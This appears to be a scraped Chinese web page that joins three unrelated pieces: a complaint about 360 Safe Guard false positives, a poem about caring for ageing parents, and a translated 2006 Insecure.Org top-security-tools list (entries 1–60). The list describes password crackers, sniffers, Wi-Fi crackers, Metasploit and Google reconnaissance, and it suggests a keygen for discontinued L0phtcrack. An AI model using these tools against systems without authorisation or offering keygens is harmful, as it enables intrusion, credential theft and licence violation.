装上360安全卫士“清除”所有扫描出的“流氓软件”。然后在windows目录下自己生成
一个名为finder.com的文件(的生成的finder.com文件内容是 fuck fuck fuck...)再用
360扫描看看。。。居然告诉我发现一个木马...汗......
我有点不感相信了,这就是全中国正在热炒的360安全卫士???我接着在C:\Program Files\baidu\bar
目录下(自己建的)生成了名为:baidubar.dll的文件。这下奇迹又发生了。可爱的360安全智慧星报出了
“百度超级搜霸”恶意软件。 危险级别 高!!!!! 点清除居然把我那个自己生成的充漫fuck的baidubar.dll
给删除了。 狂....汗....无语了。
什么杀不杀流氓,我看360安全卫士根本都没有放在心上,只是因为现在这是热门话题,热点。这个号称
捞偏门的“流氓软件之爷”的周鸿袆怎么又会放过这样一个炒作的机会呢。 当他的目的达到时,中国又
将有一批有识的程序员将追随.........会有无数智慧星出来~~~~ 因为在中国真的是太好呼悠了。真可
谓:爱炒才会赢~~~#!¥!¥!¥ 先是流氓软件,再是360安全智慧星。大家等着为中国软件业
默哀吧。~!!¥!¥!¥!%!%!%
我的孩子:
哪天
如果你看到我日渐老去
反映慢慢迟钝
身体也渐渐不行时
请耐着性子试着了解我,理解我…………
当我吃的脏兮兮
甚至已不会穿衣服时
不要嘲笑我
耐心一点儿
记得我曾经花了多少时间教你这些事吗?
如何好好地吃,好好的穿,
如何面对你的生命中的第一次;
当我一再重复
说着同样的事情时
请你不要打断我
听我说
小时候
我必须一遍又一遍地读着同样的故事
直到你静静地睡着;
当与我交谈时
忽然不知道该说什么了
给我一些时间想想
如果我还是无能为力
不要紧张
对我而言重要的不是说话
而是能跟你在一起 ;
当我不想洗澡时
不要羞辱我
也不要责骂我
记得小时候我曾经编出多少理由只为了哄你洗澡嘛?
当我外出
找不到家的时候
请不要生气
也不要把我一个人扔在外边
慢慢带我回家
记得小时候我曾经多少次因为你迷路而焦急的找你嘛?
当我神智不清
不小心砸碎饭碗的时候
请不要责骂我
记得小时候你曾经多少次将饭菜扔到地上嘛?
当我的腿不听使唤时
请扶我一把
就像我当初扶着你踏出你人生的第一步 ;
当哪天我告诉你我不想再活下去了
不要生气
总有一天你会了解
了解我已风烛残年来日可数
有一天
你会发现
即使我有许多过错
我总是尽我所能给你最好的 ;
我爱你
我的孩子!
可怜天下父母心!
终于有一天,
他们去世了,
突然你想起了
所有从来没做过的事,
它们像榔头般痛击着你的心。
如果父母仍健在,
那么别忘了比以往任何时候都更深地爱着他们;
如果他们已经不幸永远离开了你,
那么你必须记得,
父母的爱才是天底下最无私的爱!
好好看看,也善待自己的父母.
祝天下所有的父母幸福安康!
文章属性:翻译
文章提交:fatb (fatb_at_security.zz.ha.cn)
译者:天天安全网 tulip
在2000和2003年非常成功的推出了安全工具调查后,Insecure.Org 非常高兴为大家带来2006年度的安全工具调查。我-Fyodor对nmap-hackers 邮件列表中的用户进行了调查,让大家来分享他们最喜欢用的工具,结果有3243名用户提供了反馈信息。我从反馈信息中选取了大家最喜欢的前100种工具,并将它们进行了分类。建议安全界人士仔细阅读这份列表,并对不熟悉或未听说过的工具进行研究,相信会有很大帮助。我自己就从中发现了很多以前没有使用过但非常好用的工具。当很多菜鸟问我“我不知道当一个黑客该从何开始”时,我就让他们来读读这篇文章。
受访者被要求列出各种平台上的开源和商业工具。商业工具会在列表中进行标注。Nmap Security Scanner 没有参与投票,因为调查是在Nmap的邮件列表中进行的。因为受访者多为黑客的原因,所以此列表中攻击型的工具偏多一些,防守型的则少一些。
列表中每个工具都含有以下一种或几种属性:2003年调查列表中未出现的工具;相对于2003年调查列表排名升或降;需要花钱购买。但可以免费获得限制、演示、试用版本软件;可以工作于Linux平台之上;可以工作于OpenBSD、FreeBSD、Solaris 或其它UNIX平台之上;可以工作于苹果Mac OS X平台之上;可以工作于微软Windows平台之上;提供命令行操作方式;提供图形化用户界面;在互联网上可以找到源代码。
如果您发现列表中的工具有更新或者有其它建议--或者有更好的工具图标 可以发送邮件给我。如果您的工具入选此列表了,或者您认为您网站的访客也许会对此列表感兴趣,欢迎您通过link banners把本文链接到您网站上。以下开始为正式列表,按受欢迎程度降序排列:
#1 Nessus:最好的UNIX漏洞扫描工具
Nessus 是最好的免费网络漏洞扫描器,它可以运行于几乎所有的UNIX平台之上。它不止永久升级,还免费提供多达11000种插件(但需要注册并接受EULA-acceptance--终端用户授权协议)。它的主要功能是远程或本地(已授权的)安全检查,客户端/服务器架构,GTK(Linux下的一种图形界面)图形界面,内置脚本语言编译器,可以用其编写自定义插件,或用来阅读别人写的插件。Nessus 3 已经开发完成(now closed source),其现阶段仍然免费,除非您想获得最新的插件。
--------------------------------------------------------------------------------
#2 Wireshark:网络嗅探工具
Wireshark (2006年夏天之前叫做 Ethereal)是一款非常棒的Unix和Windows上的开源网络协议分析器。它可以实时检测网络通讯数据,也可以检测其抓取的网络通讯数据快照文件。可以通过图形界面浏览这些数据,可以查看网络通讯数据包中每一层的详细内容。Wireshark拥有许多强大的特性:包含有强显示过滤器语言(rich display filter language)和查看TCP会话重构流的能力;它更支持上百种协议和媒体类型; 拥有一个类似tcpdump(一个Linux下的网络协议分析工具)的名为tethereal的的命令行版本。不得不说一句,Ethereal已经饱受许多可远程利用的漏洞折磨,所以请经常对其进行升级,并在不安全网络或敌方网络(例如安全会议的网络)中谨慎使用之。
--------------------------------------------------------------------------------
#3 Snort:一款广受欢迎的开源IDS(Intrusion Detection System)(入侵检测系统)工具
这款小型的入侵检测和预防系统擅长于通讯分析和IP数据包登录(packet logging)。Snort除了能够进行协议分析、内容搜索和包含其它许多预处理程序,还可以检测上千种蠕虫病毒、漏洞、端口扫描以及其它可疑行为检测。Snort使用一种简单的基于规则的语言来描述网络通讯,以及判断对于网络数据是放行还是拦截,其检测引擎是模块化的。 用于分析Snort警报的网页形式的引擎 Basic Analysis and Security Engine (BASE)可免费获得。
开源的Snort为个人、小企业、集团用户提供良好的服务。其母公司SourceFire提供丰富的企业级特性和定期升级以丰富其产品线。提供(必须注册)5天免费的规则试用,您也可以在Bleeding Edge Snort找到很多免费规则。
--------------------------------------------------------------------------------
#4 Netcat:网络瑞士军刀
这个简单的小工具可以读和写经过TCP或UDP网络连接的数据。它被设计成一个可靠的可以被其它程序或脚本直接和简单使用的后台工具。同时,它也是一个功能多样的网络调试和检查工具,因为它可以生成几乎所有您想要的网络连接,包括通过端口绑定来接受输入连接。Netcat最早由Hobbit在1995年发布,但在其广为流传的情况下并没有得到很好的维护。现在nc110.tgz已经很难找了。这个简单易用的工具促使了很多人写出了很多其它Netcat应用,其中有很多功能都是原版本没有的。其中最有趣的是Socat,它将Netcat扩展成可以支持多种其它socket类型,SSL加密,SOCKS代理,以及其它扩展的更强大的工具。它也在本列表中得到了自己的位置(第71位)。还有Chris Gibson's Ncat,能够提供更多对便携设备的支持。其它基于Netcat的工具还有OpenBSD's nc,Cryptcat,Netcat6,PNetcat,SBD,又叫做GNU Netcat。
--------------------------------------------------------------------------------
#5 Metasploit Framework:黑掉整个星球
2004年Metasploit的发布在安全界引发了强烈的地震。没有一款新工具能够一发布就挤进此列表的15强(也就是说2000年和2003年的调查没有这种情况),更何况此工具更在5强之列,超过了很多广为流传的诞生了几十年的老牌工具。它是一个强大的开源平台,供开发、测试和使用恶意代码。这种可扩展的模型将负载控制、编码器、无操作生成器和漏洞整合在一起,使得Metasploit Framework成为一种研究高危漏洞的途径。它自带上百种漏洞,还可以在online exploit building demo(在线漏洞生成演示)看到如何生成漏洞。这使得您自己编写漏洞变得更简单,它势必将提升非法shellcode代码的水平,扩大网络阴暗面。与其相似的专业漏洞工具,例如Core Impact和Canvas已经被许多专业领域用户使用。Metasploit降低了这种能力的门槛,将其推广给大众。
--------------------------------------------------------------------------------
#6 Hping2:一种网络探测工具,是ping的超级变种
这个小工具可以发送自定义的ICMP,UDP和TCP数据包,并接收所有反馈信息。它的灵感来源于ping命令,但其功能远远超过ping。它还包含一个小型的路由跟踪模块,并支持IP分段。此工具可以在常用工具无法对有防火墙保护的主机进行路由跟踪/ping/探测时大显身手。它经常可以帮助您找出防火墙的规则集,当然还可以通过它来学习TCP/IP协议,并作一些IP协议的实验。
--------------------------------------------------------------------------------
#7 Kismet:一款超强的无线嗅探器
Kismet是一款基于命令行(ncurses)的802.11 layer2无线网络探测器、嗅探器、和入侵检测系统。它对网络进行被动嗅探(相对于许多主动工具,例如NetStumbler),可以发现隐形网络(非信标)。它可以通过嗅探TCP、UDP、ARP和DHCP数据包来自动检测网络IP段,以Wireshark/TCPDump兼容格式记录通讯日志,更加可以将被检测到的网络分块并按照下载的分布图进行范围估计。如您所想,这款工具一般被wardriving所使用。嗯!还有warwalking、warflying和warskating……
--------------------------------------------------------------------------------
#8 Tcpdump:最经典的网络监控和数据捕获嗅探器
在Ethereal(Wireshark)出现之前大家都用Tcpdump,而且很多人现在还在一直使用。它也许没有Wireshark那么多花里胡哨的东西(比如漂亮的图形界面,亦或数以百计的应用协议逻辑分析),但它能出色的完成很多任务,并且漏洞非常少,消耗系统资源也非常少。它很少添加新特性了,但经常修复一些bug和维持较小的体积。它能很好的跟踪网络问题来源,并能监控网络活动。其Windows下的版本叫做WinDump。Libpcap/WinPcap的包捕获库就是基于TCPDump,它也用在Nmap等其它工具中。
--------------------------------------------------------------------------------
#9 Cain and Abel:Windows平台上最好的密码恢复工具
UNIX用户经常声称正是因为Unix平台下有很多非常好的免费安全工具,所以Unix才会成为最好的平台,而Windows平台一般不在他们的考虑范围之内。他们也许是对的,但Cain & Abel确实让人眼前一亮。这种只运行于Windows平台的密码恢复工具可以作很多事情。它可以通过嗅探网络来找到密码、利用字典破解加密密码、暴力破解密码和密码分析、记录VoIP会话、解码非常复杂的密码、星号查看、剥离缓存密码以及分析路由协议。另外其文档也很齐全(well documented)。
--------------------------------------------------------------------------------
#10 John the Ripper:一款强大的、简单的以及支持多平台的密码破解器
John the Ripper是最快的密码破解器,当前支持多种主流Unix (官方支持11种,没有计算不同的架构)、DOS、Win32、BeO和OpenVMS。它的主要功能就是检测弱Unix密码。它支持主流Unix下的多种(3种)密码哈希加密类型,它们是Kerberos、AFS以及Windows NT/2000/XP LM。其它哈希类型可以通过补丁包加载。如果您希望从一些单词表开始的话,您可以在这里、这里和这里找到。
--------------------------------------------------------------------------------
#11 Ettercap:为交换式局域网提供更多保护
Ettercap是一款基于终端的以太网络局域网嗅探器/拦截器/日志器。它支持主动和被动的多种协议解析(甚至是ssh和https这种加密过的)。还可以进行已建立连接的数据注入和实时过滤,保持连接同步。大部分嗅探模式都是强大且全面的嗅探组合。支持插件。能够识别您是否出在交换式局域网中,通过使用操作系统指纹(主动或被动)技术可以得出局域网结构。
--------------------------------------------------------------------------------
#12 Nikto:非常全面的网页扫描器
Nikto是一款开源的(GPL)网页服务器扫描器,它可以对网页服务器进行全面的多种扫描,包含超过3200种有潜在危险的文件/CGIs;超过625种服务器版本;超过230种特定服务器问题。扫描项和插件可以自动更新(如果需要)。基于Whisker/libwhisker完成其底层功能。这是一款非常棒的工具,但其软件本身并不经常更新,最新和最危险的可能检测不到。
--------------------------------------------------------------------------------
#13 Ping/telnet/dig/traceroute/whois/netstat:基本命令
虽然有很多重型的高科技网络安全工具,但是不要忘记其基础!所有网络安全人士都要对这些基本命令非常熟悉,因为它们对大多数平台都适用(在Windows平台上whois为tracert)。它们可以随手捏来,当然如果需要使用一些更高级的功能可以选择Hping2和Netcat。
--------------------------------------------------------------------------------
#14 OpenSSH / PuTTY / SSH:访问远程计算机的安全途径
SSH(Secure Shell)现在普遍应用于登录远程计算机或在其上执行命令。它为不安全网络上的两台不互信计算机间通讯提供安全加密,代替非常不可靠的telnet/rlogin/rsh交互内容。大多UNIX使用开源的OpenSSH服务器和客户端程序。Windows用户更喜欢免费的PuTTY客户端,它也可以运行在多种移动设备上。还有一些Windows用户喜欢使用基于终端的OpenSSH模拟程序Cygwin。还有其它很多收费和免费的客户端。您可以在这里和这里找到。
--------------------------------------------------------------------------------
#15 THC Hydra:支持多种服务的最快的网络认证破解器
如果您需要暴力破解一个远程认证服务,Hydra经常会是选择对象。它可以同时对30个以上的端口进行基于字典的快速破解,包括telnet、ftp、http、https、smb、多种数据库及其它服务。和THC Amap一样,此Hydra版本来自于民间组织THC。
--------------------------------------------------------------------------------
#16 Paros proxy:网页程序漏洞评估代理
基于Java的网页程序漏洞评估代理。支持实时编辑和浏览HTTP/HTTPS信息,修改例如Cookie和表字段中的内容。它包含有网页通讯记录器、网页小偷(web spider)、哈希计算器和一个常用网页程序攻击扫描器,例如SQL注入和跨网站脚本等。
--------------------------------------------------------------------------------
#17 Dsniff:一款超强的网络评估和渗透检测工具套装
由Dug Song精心设计并广受欢迎的这款套装包含很多工具。Dsniff、filesnarf、mailsnarf、msgsnarf、urlsnarf和webspy通过被动监视网络以获得敏感数据(例如密码、邮件地址、文件等)。Arpspoof、dnsspoof和macof能够拦截一般很难获取到的网络通讯信息(例如由于使用了第二层转换(layer-2 switching))。Sshmitm和webmitm通过ad-hoc PKI中弱绑定漏洞对ssh和https会话进行重定向实施动态monkey-in-the-middle(利用中间人攻击技术,对会话进行劫持)攻击。Windows版本可以在这里获取。总之,这是一个非常有用的工具集。它能完成几乎所有密码嗅探需要作的工作。
--------------------------------------------------------------------------------
#18 NetStumbler:免费的Windows 802.11嗅探器
Netstumbler是广为人知的寻找开放无线访问接入点的Windows工具("wardriving")。其PDA上的WinCE系统版本名叫Ministumbler。此软件当前免费,但只能够运行在Windows平台上,且代码不公开。它使用很多主动方法寻找WAP,而Kismet或KisMAC则更多使用被动嗅探。
--------------------------------------------------------------------------------
#19 THC Amap:一款应用程序指纹扫描器
Amap是一款很棒的程序,它可以检测出某一端口正在被什么程序监听。因为其独有的version detection特性,所以其数据库不会象Nmap一样变得很大,在Nmap检测某一服务失败或者其它软件不起作用时可以考虑使用之。Amap的另一特性是其能够解析Nmap输出文件。这也是THC贡献的另一款很有价值的工具。
--------------------------------------------------------------------------------
#20 GFI LANguard:一款Windows平台上的商业网络安全扫描器
GFI LANguard通过对IP网络进行扫描来发现运行中的计算机,然后尝试收集主机上运行的操作系统版本和正在运行的应用程序。我曾经尝试收集到了Windows主机上的service pack级别、缺少的安全更新、无线访问接入点、USB设备、开放的共享、开放的端口、正在运行的服务和应用程序、主要注册表项、弱密码、用户和组别以及其它更多信息。扫描结果保存在一份可自定义/可查询的HTML报告文档中。它还含有一个补丁管理器,可以检查并安装缺少的补丁。试用版可以免费获得,但只能使用30天。
--------------------------------------------------------------------------------
#21 Aircrack:最快的WEP/WPA破解工具
Aircrack是一套用于破解802.11a/b/g WEP和WPA的工具套装。一旦收集到足够的加密数据包它可以破解40到512位的WEP密匙,它也可以通过高级加密方法或暴力破解来破解WPA 1或2网络。套装中包含airodump(802.11数据包捕获程序)、aireplay (802.11数据包注入程序)、aircrack(静态WEP和WPA-PSK破解),和airdecap(解密WEP/WPA捕获文件)。
--------------------------------------------------------------------------------
#22 Superscan:只运行于Windows平台之上的端口扫描器、ping工具和解析器
SuperScan是一款Foundstone开发的免费的只运行于Windows平台之上的不开源的TCP/UDP端口扫描器。它其中还包含许多其它网络工具,例如ping、路由跟踪、http head和whois。
--------------------------------------------------------------------------------
#23 Netfilter:最新的Linux核心数据包过滤器/防火墙
Netfilter是一款强大的运行于标准Linux核心上的包过滤器。它集成了用户空间IP列表工具。当前,它支持包过滤(无状态或有状态)、所有类型的网络地址和端口转换(NAT/NAPT)并支持多API层第三方扩展。它包含多种不同模块用来处理不规则协议,例如FTP。其它UNIX平台请参考Openbsd PF(只用于OpenBSD)或者IP Filter。许多个人防火墙(personal firewalls)都支持Windows (Tiny、Zone Alarm、Norton、Kerio...),但都不提供上述IP列表。微软在Windows XP SP2中集成了一款非常基础的防火墙,如果您不安装它,它就会不断地提示您安装。
--------------------------------------------------------------------------------
#24 Sysinternals:一款强大的非常全面的Windows工具合集
Sysinternals为Windows低级入侵提供很多非常有用的小工具。其中一部分是免费的,有些还附有源代码,其它是需要付费使用的。受访者最喜欢此集合中的以下工具:
ProcessExplorer 监视所有进程打开的所有文件和目录(类似Unix上的LSoF)。
PsTools 管理(执行、挂起、杀死、查看)本地和远程进程。
Autoruns 发现系统启动和登陆时加载了哪些可执行程序。
RootkitRevealer 检测注册表和文件系统API异常,用以发现用户模式或内核模式的rootkit工具。
TCPView 浏览每个进程的TCP和UDP通讯终点(类似Unix上的Netstat)。
生产此软件的公司已被微软于2005年收购,所以其未来产品线特征无法预测。
--------------------------------------------------------------------------------
#25 Retina:eEye出品的商业漏洞评估扫描器
象Nessus一样,Retina的功能是扫描网络中所有的主机并报告发现的所有漏洞。eEye出品,此公司以其security research而闻名。
--------------------------------------------------------------------------------
#26 Perl / Python / Ruby:简单的、多用途的脚本语言
常用的安全问题都能在网上找到工具解决,但使用脚本语言您可以编写您自己的(或编辑现有的)工具,当您需要解决某种特定问题的时候。快速、简单的脚本语言可以测试、发现漏洞甚至修复系统漏洞。CPAN上充满了类似Net::RawIP和执行协议的程序模块,可以使您的工作更加轻松。
--------------------------------------------------------------------------------
#27 L0phtcrack:Windows密码猜测和恢复程序
L0phtCrack也叫作LC5,用来尝试通过哈希(通过某种访问方式获得的)方法破解诸如Windows NT/2000工作站、联网服务器、主域控制器、或活动目录密码,有时它也可以通过嗅探获得密码的哈希值。它还可以通过多种手段来猜测密码(字典、暴力破解等等)。Symantec公司2006年已经停止了LC5的开发,但LC5 installer的安装文件随处可以找到。免费试用版只能使用15天,Symantec已经停止出售此软件的注册码,所以如果您不想放弃使用它,就必须找到一个与其对应的注册码生成器(key generator)。因为Symantec不再维护此软件,所以最好尝试用Cain and Abel或John the Ripper来代替之。
--------------------------------------------------------------------------------
#28 Scapy:交互式数据包处理工具
Scapy是一款强大的交互式数据包处理工具、数据包生成器、网络扫描器、网络发现工具和包嗅探工具。它提供多种类别的交互式生成数据包或数据包集合、对数据包进行操作、发送数据包、包嗅探、应答和反馈匹配等等功能。Python解释器提供交互功能,所以要用到Python编程知识(例如variables、loops、和functions)。支持生成报告,且报告生成简单。
--------------------------------------------------------------------------------
#29 Sam Spade:Windows网络查询免费工具
Sam Spade为许多网络查询的一般工作提供了图形界面和方便的操作。此工具设计用于跟踪垃圾信息发送者,但它还可以用于许多其它的网络探查、管理和安全工作。它包含许多有用的工具,例如ping、nslookup、whois、dig、路由跟踪、查找器、原始HTTP网页浏览器、DNS地址转换、SMTP中继检查、网站搜索等等。非Windows用户可以在线使用更多其它工具。
--------------------------------------------------------------------------------
#30 GnuPG / PGP :对您的文件和通讯进行高级加密
PGP是Phil Zimmerman出品的著名加密程序,可以使您的数据免受窃听以及其它危险。GnuPG是一款口碑很好的遵守PGP标准的开源应用(可执行程序名为gpg)。GunPG是免费的,而PGP对某些用户是收费的。
--------------------------------------------------------------------------------
#31 Airsnort:802.11 WEP加密破解工具
AirSnort是一款用来恢复加密密码的无线LAN(WLAN)工具。Shmoo Group出品,工作原理是被动监控传输信息,当收集到足够多的数据包后开始计算加密密码。Aircrack和它很像。
--------------------------------------------------------------------------------
#32 BackTrack:一款极具创新突破的Live(刻在光盘上的,光盘直接启动) 光盘自启动Linux系统平台
这款卓越的光盘自启动Linux系统是由Whax和Auditor合并而成。它以其超级多的安全和防护工具配以丰富的开发环境而闻名。重点在于它的用户模块化设计,用户可以自定义将哪些模块刻到光盘上,例如自己编写的脚本、附加工具、自定义内核等等。
--------------------------------------------------------------------------------
#33 P0f:万能的被动操作系统指纹工具
P0f能够通过捕获并分析目标主机发出的数据包来对主机上的操作系统进行鉴别,即使是在系统上装有性能良好的防火墙的情况下也没有问题。P0f不增加任何直接或间接的网络负载,没有名称搜索、没有秘密探测、没有ARIN查询,什么都没有。某些高手还可以用P0f检测出主机上是否有防火墙存在、是否有NAT、是否存在负载平衡器等等!
--------------------------------------------------------------------------------
#34 Google:人人喜爱的搜索引擎
Google当然不是什么安全工具,但是它超级庞大的数据库却是安全专家和入侵者最好的资源。如果您想了解某一公司,您可以直接用它搜索 “site:target-domain.com”,您可以获得员工姓名、敏感信息(通常公司不对外公开的,但在Google上就难说了)、公司内部安装的软件漏洞等等。同样,如果您在Google上发现一个有某个漏洞的网站,Google还会提供给您其它有相同漏洞的网站列表。其中利用Google进行黑客活动的大师Johny Long建立了一个Google黑客数据库(Google Hacking Database)还出版了一本如何用Google进行黑客活动的书Google Hacking for Penetration Testers。
--------------------------------------------------------------------------------
#35 WebScarab:一个用来分析使用HTTP和HTTPS协议的应用程序框架
它的原理很简单,WebScarab记录它检测到的会话内容(请求和应答),使用者可以通过多种形式来查看记录。WebScarab的设计目的是让使用者可以掌握某种基于HTTP(S)程序的运作过程;也可以用它来调试程序中较难处理的bug,也可以帮助安全专家发现潜在的程序漏洞。
--------------------------------------------------------------------------------
#36 Ntop:网络通讯监控器
Ntop以类似进程管理器的方式显示网络使用情况。在应用程序模式下,它能显示用户终端上的网络状况。在网页模式下,它作为网页服务器,以HTML文档形式显示网络状况。它是NetFlow/sFlow发射和收集器,通过一个基于HTTP的客户端界面来生成以ntop为中心的监控程序,RRD(Round Robin Database)(环形数据库)用来持续储存网络通讯状态信息。
--------------------------------------------------------------------------------
#37 Tripwire:很老的文件完整性检查器
一款文件和目录完整性检查器。Tripwire是一种可以帮助系统管理员和一般用户监控某一特定文件或目录变化的工具。可以用以对系统文件作日常(例如:每天)检查,Tripwire可以向系统管理员通报文件损坏或被篡改情况,所以这是一种周期性的文件破坏控制方法。免费的开源Linux版本可以在Tripwire.Org下载到。AIDE是UNIX平台的Tripwire替代品。或者Radmind、RKHunter和chkrootkit也是很好的选择。Windows用户请使用Sysinternals出品的RootkitRevealer。
--------------------------------------------------------------------------------
#38 Ngrep:方便的数据包匹配和显示工具
ngrep尽可能多的去实现GNU grep的功能,将它们应用于网络层。Ngrep是一款pcap-aware工具,它允许指定各种规则式或16进制表达式去对数据负载或数据包进行匹配。当前支持TCP、UDP、以太网上的ICMP、PPP、SLIP、FDDI、令牌环(Token Ring)和空接口(null interfaces),还能理解类似Tcpdump和snoop等一样形式的bpf过滤器逻辑。
--------------------------------------------------------------------------------
#39 Nbtscan:在Windows网络上收集NetBIOS信息
NBTscan是一款在IP网络上扫描NetBIOS名称信息的工具。它通过给指定范围内所有地址发送状态查询来获得反馈信息并以表形式呈现给使用者。每一地址的反馈信息包括IP地址、NetBIOS计算机名、登录用户、MAC地址。
--------------------------------------------------------------------------------
#40 WebInspect:强大的网页程序扫描器
SPI Dynamics' WebInspect应用程序安全评估工具帮您识别已知和未知的网页层漏洞。它还能检测到Web服务器的配置属性,以及进行常见的网页攻击,例如参数注入、跨网站脚本、目录游走等等。
--------------------------------------------------------------------------------
#41 OpenSSL:最好的SSL/TLS加密库
OpenSSL项目的目的是通过开源合作精神开发一种健壮的、可以和同类型商业程序媲美的、全功能的,且开源的应用于SSL v2/v3(Secure Sockets Layer)和TLS v1(Transport Layer Security)协议的普遍适用的加密库工具集。本项目由世界范围内的志愿者们维护,他们通过互联网联络、计划和开发OpenSSL工具集及其相关文档。
--------------------------------------------------------------------------------
#42 Xprobe2:主动操作系统指纹工具
XProbe是一款远程主机操作系统探查工具。开发者基于和Nmap相同的一些技术(same techniques),并加入了自己的创新。Xprobe通过ICMP协议来获得指纹。
--------------------------------------------------------------------------------
#43 EtherApe:EtherApe是Unix平台上的模仿etherman的图形界面网络监控器
包含连接层、IP和TCP三种模式,EtherApe网络活动图通过不同颜色来标识不同协议。主机和连接的图形大小随通讯情况而变化。它支持以太网、FDDI、令牌环、ISDN、PPP和SLIP设备。它可以实施过滤网络通讯,也可以抓取网络通讯快照文件。
--------------------------------------------------------------------------------
#44 Core Impact:全自动的全面入侵检测工具
Core Impact可不便宜(先准备个上万美元吧),但它却是公认的最强的漏洞检测工具。它有一个强大的定时更新的专业漏洞数据库,它可以轻易的黑掉一台计算机,并以它为跳板再去作别的事情。如果您买不起Core Impact,可以看看比较便宜的Canvas或者免费的Metasploit Framework。当然,三个同时用是最好的了。
--------------------------------------------------------------------------------
#45 IDA Pro:Windows或Linux反编译器和调试器
反编译器是一块很重要的安全研究方向。它可以帮您拆解微软的补丁,以了解微软未公开并悄悄修补的漏洞,或直接以二进制的方式对某个服务器进行检测,以找出为何某个存在的漏洞不起作用。反编译器有很多,但IDA Pro是遵守二进制包事实标准(de-facto standard)的恶意代码和漏洞研究分析工具。这个图形化的、可编程的、可扩展的、支持多处理器的反编译器现在有了一个和Windows一模一样的Linux(命令行模式)版本。
--------------------------------------------------------------------------------
#46 SolarWinds:网络发现/监控/攻击系列工具
SolarWinds生产和销售了许多专业的系统管理工具。安全相关的包括许多网络发现扫描器、一个SNMP暴力破解器、路由器密码解密器、TCP连接重置程序、最快最易用的一个路由器设置下载和上传程序等等。
--------------------------------------------------------------------------------
#47 Pwdump:一款Windows密码恢复工具
Pwdump可以从Windows主机中取得NTLM和LanMan哈希值,无论系统密码是否启用。它还能显示系统中存在的历史密码。数据输出格式为L0phtcrack兼容格式,也可以以文件形式输出数据。
--------------------------------------------------------------------------------
#48 LSoF:打开文件列表
这是一款Unix平台上的诊断和研究工具,它可以列举当前所有进程打开的文件信息。它也可以列举所有进程打开的通讯socket(communications sockets)。Windows平台上类似的工具有Sysinternals。
--------------------------------------------------------------------------------
#49 RainbowCrack:极具创新性的密码哈希破解器
RainbowCrack是一款使用了大规模内存时间交换(large-scale time-memory trade-off)技术的哈希破解工具。传统的暴力破解工具会尝试每一个可能的密码,要破解复杂的密码会很费时。RainbowCrack运用时间交换技术对破解时间进行预计算,并将计算结果存入一个名叫"rainbow tables"的表里。预计算确实也会花费较长时间,但相对暴力破解来说则短多了,而且一旦预计算完成破解开始,那么破解所需要的时间就非常非常短了。
--------------------------------------------------------------------------------
#50 Firewalk:高级路由跟踪工具
Firewalk使用类似路由跟踪的技术来分析IP数据包反馈,以确定网关ACL过滤器类型和网络结构。㊣ COPY BY TTIAN.NET ㊣ 这款经典的工具在2002年十月由scratch重写。这款工具的大部分功能Hping2的路由跟踪部分也都能实现。
--------------------------------------------------------------------------------
#51 Angry IP Scanner:一款非常快的Windows IP 扫描器和端口扫描器
Angry IP Scanner能够实现最基本的Windows平台上的主机发现和端口扫描。它的体积非常的小,它还可以通过挂载插件(a few plugins)来获得主机其它信息。
--------------------------------------------------------------------------------
#52 RKHunter:一款Unix平台上的Rootkit检测器
RKHunter是一款检测例如rootkit、后门、漏洞等恶意程序的工具。它采用多种检测手段,包括MD5哈希值对比、rootkits原始文件名检测、文件权限检测,以及LKM和KLD模块中的可疑字符串检测。
--------------------------------------------------------------------------------
#53 Ike-scan:VPN检测器和扫描器
Ike-scan是一款检测IKE(Internet Key Exchange)服务传输特性的工具,IKE是VPN网络中服务器和远程客户端建立连接的机制。在扫描到VPN服务器的IP地址后,将改造过的IKE数据包分发给VPN网中的每一主机。只要是运行IKE的主机就会发回反馈来证明它存在。此工具然后对这些反馈数据包进行记录和显示,并将它们与一系列已知的VPN产品指纹进行对比。Ike-scan的VPN指纹包含来自Checkpoint、Cisco、Microsoft、Nortel和Watchguard的产品。
--------------------------------------------------------------------------------
#54 Arpwatch:持续跟踪以太网/IP地址配对,可以检查出中间人攻击
Arpwatch是LBNL网络研究组出品的一款经典的ARP中间人(man-in-the-middle)攻击检测器。它记录网路活动的系统日志,并将特定的变更通过Email报告给管理员。Arpwatch使用LibPcap来监听本地以太网接口ARP数据包。
--------------------------------------------------------------------------------
#55 KisMAC:一款Mac OS X上的图形化被动无线网络搜寻器
这款Mac OS X下非常流行的搜寻器和Kismet功能差不多,但和Kismet不同的是Kismet是基于命令行的,而KisMac有很漂亮的图形化界面,在OS X上出现得也比Kismet早。它同时还提供映射、Pcap兼容格式数据输入、登录和一些解密、验证破解功能。
--------------------------------------------------------------------------------
#56 OSSEC HIDS:一款开源的基于主机的入侵检测系统
OSSEC HIDS的主要功能有日志分析、完整性检查、rootkit检测、基于时间的警报和主动响应。除了具有入侵检测系统功能外,它还一般被用在SEM/SIM(安全事件管理(SEM: Security Event Management)/安全信息管理(SIM:Security Information Management))解决方案中。因其强大的日志分析引擎,ISP(Internet service provider)(网络服务提供商)、大学和数据中心用其监控和分析他们的防火墙、入侵检测系统、网页服务和验证等产生的日志。
--------------------------------------------------------------------------------
#57 Openbsd PF:OpenBSD数据包过滤器
象其它平台上的Netfilter和IP Filter一样,OpenBSD用户最爱用PF,这就是他们的防火墙工具。它的功能有网络地址转换、管理TCP/IP通讯、提供带宽控制和数据包分级控制。它还有一些额外的功能,例如被动操作系统检测。PF是由编写OpenBSD的同一批人编写的,所以您完全可以放心使用,它已经经过了很好的评估、设计和编码以避免暴露其它包过滤器(other packet filters)上的类似漏洞。
--------------------------------------------------------------------------------
#58 Nemesis:简单的数据包注入
Nemesis项目设计目的是为Unix/Linux(现在也包含Windows了)提供一个基于命令行的、小巧的、人性化的IP堆栈。此工具套装按协议分类,并允许对已注入的数据包流使用简单的shell脚本。如果您喜欢Nemesis,您也许对Hping2也会感兴趣,它们是互补的关系。
--------------------------------------------------------------------------------
#59 Tor:匿名网络通讯系统
Tor是一款面向希望提高其网络安全性的广大组织和大众的工具集。Tor的功能有匿名网页浏览和发布、即时信息、irc、ssh以及其它一些TCP协议相关的功能。Tor还为软件开发者提供一个可开发内置匿名性、安全性和其它私密化特性的软件平台。在Vidalia可以获得跨平台的图形化界面。
--------------------------------------------------------------------------------
#60 Knoppix:一款多用途的CD或DVD光盘自启动系统
Knoppix由一系列典型的GNU/Linux软件组成,可以自动检测硬件环境,支持多种显卡、声卡、SCSI和USB设备以及其它外围设备。KNOPPIX作为一款高效的Linux光盘系统,可以胜任例如桌面系统、Linux教学光盘、救援系统等多种用途,经过这次在nmap中调查证实,它也是一款很小巧的安全工具。如果要使用更专业的Linux安全系统请看BackTrack。
--------------------------------------------------------------------------------
